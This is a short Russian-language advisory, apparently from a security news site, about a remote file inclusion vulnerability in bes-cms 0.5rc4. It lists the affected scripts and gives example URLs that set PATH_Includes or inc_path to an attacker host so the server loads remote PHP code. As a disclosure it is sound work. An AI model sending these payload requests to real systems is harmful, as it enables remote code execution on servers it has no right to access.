Удаленное выполнение произвольного кода в bes-cms

Рекомендуем почитать:

Xakep #299. Sysmon

Программа: bes-cms 0.5rc4

Уязвимость включения файлов обнаружена в
bes-cms. Удаленный пользователь может выполнить произвольные команды на целевой системе.
Уязвимость включения файлов обнаружена в нескольких сценариях
(index.inc.php, Members/index.inc.php, Members/root/index.inc.php, Include/functions_folder.php
file, Include/functions_hacking.php, Include/functions_message.php, и Include/Start.php). В результате удаленный атакующий может выполнить произвольный PHP код на уязвимой системе.

Пример:

Including of file : (if register_globals=ON):

http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/index.inc.php? PATH_Includes=http://[attacker]/
http://[target]/Members/root/index.inc.php? PATH_Includes=http://[attacker]/
Could include the file : http://[attacker]/actions_default.php
http://[target]/Include/functions_folder.php?PATH_Includes= http://[attacker]/
Could include the files : http://[attacker]/functions_folder_modules.php
http://[attacker]/functions_folder_plugins.php
http://[attacker]/functions_folder_files.php
http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=usershow
http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=logger
Could include the file : http://[attacker]/functions_user.php
http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=send_bug&UserDetails
[LOGGED_IN]=YES
Could include the file : http://[attacker]/functions_error.php
http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=content_view
Could include the file : http://[attacker]/functions_message_docTypes.php
http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=search
Could include the file : http://[attacker]/functions_general.php
http://[target]/Include/functions_message.php?PATH_Includes= http://[attacker]/
Could include the files : http://[attacker]/functions_message_docTypes.php
http://[attacker]/functions_message_edit.php
http://[target]/Include/Start.php?inc_path=http://[attacker]/
Could include the file : http://[attacker]/Include/vars.php

Удаленное выполнение произвольного кода в bes-cms

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Как работает EDR. Подробно разбираем механизмы антивирусной защиты

WinAPI днем и ночью. Ищем способы обращения к нативному коду из C#

Обзор перспективных исследований. Колонка Дениса Макрушина

HTB Hospital. Получаем доступ к хосту через уязвимость Ghostscript

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Банкер SoumniBot уклоняется от обнаружения с помощью обфускации манифеста Android

Эксперты нашли сеть вредоносных сайтов с картинками для кражи Telegram-аккаунтов

Фальшивые читы обманом вынуждают геймеров распространять малварь

Правоохранители закрыли фишинговую платформу LabHost

Исследователи нашли сайт, торгующий миллиардами сообщений из Discord